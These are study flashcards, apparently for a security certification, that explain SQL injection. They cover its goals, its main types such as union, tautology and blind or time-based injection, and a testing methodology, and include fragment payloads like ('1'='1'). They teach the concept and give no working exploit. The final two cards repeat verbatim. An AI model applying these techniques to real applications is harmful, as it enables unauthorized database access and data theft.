15 - SQL Injection Flashcards
What is SQL Injection?
A technique used to take advantage of un-sanitized input to pass SQL commands through a web app for execution by a backend database. It is used to either gain unauthorized access or retrieve info directly from a DB.
What kind of attacks can SQL injection be used to implement?
- Authentication Bypass: An attacker logs into app without providing valid creds and gains admin privileges
- Information Disclosure: An attacker obtains sensitive info that is stored in the database.
- Compromised Data Integrity: Attacker uses this attack to deface/insert data on a web page or alter contents of a database.
- Compromised Availability of Data: Attackers use this to delete the database info or logs or audit info in a database.
- Remote Code Execution: It assists an attacker to compromise the host OS.
What type of databases are susceptible to SQL-Injection attacks?
Relational databases.
What is an HTTP Post request?
The POST request carries the requested data as a part of the message body. The string that is submitted to the web server is visible in the body of the HTTP or HTTPS POST request.
What is a SQL query?
A SQL command that is constructed to interact with a backend SQL database.
How does a SQL injection query exploit the normal execution of SQL?
The attacker is able to exploit the application’s inability to filter the request.
What are the main types of SQL Injection?
- In-Band SQL Injection: Where an attacker uses the same communication channel to perform the attack and retrieve the results.
- Blind/Inferential SQL Injection: When there aren’t SQL error messages to work with, an attacker just sends queries and use boolean results to determine structure of DB and data. One step further, when data is not returned through the app, an attacker just sends queries “blindly”
- Out-of-Band SQL Injection: When an attacker uses different communication channels to perform attack and obtain the result
What are the types of In-Band SQL Injection?
- Error-Based SQL Injection: Attackers intentionally throw bad data into the app in order to receive database errors.
- System Stored Procedure: DB’s stored procedures are exploited.
- Illegal/Logically Incorrect Query: Attackers throw bad queries into database in order to receive database errors.
- Union SQL Injection: Attackers use a UNION clause in order to join a forged query to original query.
- Tautology: Attackers always inject statements that are true so they always return results upon evaluation of a WHERE condition. (‘1’=’1’)
- End of Line Comment: After injecting code into a particular field, legit code is nullified by end of line comments. (“–”)
- Inline Comment: Attackers integrate multiple vulnerable inputs into a single query using inline comments.
- Piggybacked Query: Attackers inject additional malicious query to the original query.
What is a Time-based SQL injection?
A way for attackers to check if a True/False statement is True. This way gets around the Generic error message response so attackers can extract data.
What is Boolean Exploitation?
Where an attacker sends multiple True/False statements (one that they know is true or false) and compare the results to determine if there expression was True or False.
What is a Heavy Query?
A query that retrieves a huge amount of data and in turn, will take a lot of time to execute by using multiple joins. This type of attack is a type of Time-based attack?
What are the steps of the SQL Injection Methodology?
- Information Gathering and SQL Injection Vulnerability Detection
- Launch SQL Injection Attacks
- Advanced SQL Injection
What type of steps are taken in the SQL Injection Info Gathering stage?
Check if web app connects to a DB server, list all input fields, hidden fields, and post requests. Attempt to inject codes to generate errors and evaluate the data in the error messages. Use a string in a number field and vice versa, use a UNION operator to combine the result-set of tow or more SELECT statements.
What are the steps of the SQL Injection Methodology?
- Information Gathering and SQL Injection Vulnerability Detection
- Launch SQL Injection Attacks
- Advanced SQL Injection
What type of steps are taken in the SQL Injection Info Gathering stage?
Check if web app connects to a DB server, list all input fields, hidden fields, and post requests. Attempt to inject codes to generate errors and evaluate the data in the error messages. Use a string in a number field and vice versa, use a UNION operator to combine the result-set of tow or more SELECT statements.